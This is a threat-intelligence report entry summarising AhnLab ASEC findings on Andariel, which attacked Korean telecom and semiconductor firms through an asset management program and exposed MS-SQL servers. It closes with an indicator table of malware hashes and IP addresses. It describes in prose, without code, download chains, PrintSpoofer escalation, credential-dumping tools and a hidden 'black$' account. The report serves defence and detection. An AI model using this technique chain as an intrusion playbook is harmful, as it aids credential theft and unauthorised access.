자산 관리 프로그램을 악용한 공격 정황 포착 (Andariel 그룹)
2023-11-10 • Ahnlab • Detection of attack circumstances abusing asset management program (Andariel Group) •
ASEC reports that Andariel, described as linked to or subordinate to Lazarus, abused a Korean asset management program and poorly managed MS-SQL servers to deploy TigerRat, NukeSped variants, Black RAT, Lilith RAT, and a Go downloader. The observed targets include Korean telecommunications and semiconductor manufacturing environments, matching prior Andariel targeting. The asset management program launched PowerShell and mshta download chains, while the MS-SQL activity used PrintSpoofer for privilege escalation and installed backdoors. The malware set up persistence through scheduled tasks, collected host and credential information, used tools such as CredentialsFileView and Network Password Recovery, and created a hidden "black$" account to support RDP access and lateral movement.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | 0414a2ab718d44bf6f7103cff287b312 | 2023-11-10 | 2024-07-25 |
| HASH | fe25c192875ec1914b8880ea3896cda2 | 2023-11-10 | 2024-07-25 |
| HASH | 33a3da2de78418b89a603e28a1e8852c | 2023-11-10 | 2024-07-25 |
| HASH | 73eb2f4f101aab6158c615094f7a632a | 2023-11-10 | 2024-07-25 |
| HASH | ad6d4eb34d29e350f96dc8df6d8a092e | 2023-11-10 | 2024-07-25 |
| HASH | 49bb2ad67a8c5dfbfe8db2169e6fa46e | 2023-11-10 | 2024-07-25 |
| HASH | 232586f8cfe82b80fd0dfa6ed8795c56 | 2023-11-10 | 2024-07-25 |
| HASH | 4053ca3e37ed1f8d37b29eed61c2e729 | 2023-11-10 | 2024-07-25 |
| HASH | 3a0c8ae783116c1840740417c4fbe678 | 2023-11-10 | 2024-07-25 |
| HASH | ca564428a29faf1a613f35d9fa36313f | 2023-11-10 | 2024-07-25 |
| HASH | 4896da30a745079cd6265b6332886d45 | 2023-11-10 | 2024-07-25 |
| HASH | dc70dc9845aa747001ebf2a02467c203 | 2023-11-10 | 2024-07-25 |
| HASH | beb199b15bd075996fa8d6a0ed554ca8 | 2023-11-10 | 2024-07-25 |
| HASH | c2f8c9bb7df688d0a7030a96314bb493 | 2023-11-10 | 2024-07-25 |
| HASH | e1afd01400ef405e46091e8ef10c721c | 2023-11-10 | 2024-07-25 |
| HASH | 7f33d2d2a2ce9c195202acb59de31eee | 2023-11-10 | 2024-07-25 |
| HASH | 13b4ce1fc26d400d34ede460a8530d93 | 2023-11-10 | 2024-07-25 |
| HASH | 41895c5416fdc82f7e0babc6bb6c7216 | 2023-11-10 | 2024-07-25 |
| HASH | 3d2ec58f37c8176e0dbcc47ff93e5a76 | 2023-11-10 | 2024-07-25 |
| HASH | c1f266f7ec886278f030e7d7cd4e9131 | 2023-11-10 | 2024-07-25 |
| IPv4 | 109.248.150.147 | 2023-11-10 | 2024-07-25 |
| IPv4 | 27.102.128.152 | 2023-11-10 | 2023-11-27 |
| IPv4 | 84.38.132.67 | 2023-11-10 | 2023-11-20 |
| IPv4 | 27.102.118.204 | 2023-11-10 | 2023-11-20 |
| IPv4 | 27.102.115.207 | 2023-11-10 | 2023-11-20 |
| IPv4 | 185.29.8.108 | 2023-11-10 | 2023-11-20 |
| HASH | 01ccce480c60fcdb67b54f4509ffdb56 | 2023-08-22 | 2023-11-20 |
| HASH | dd7b696b96434d2bf07b34f9c125d51d | 2023-08-22 | 2023-11-20 |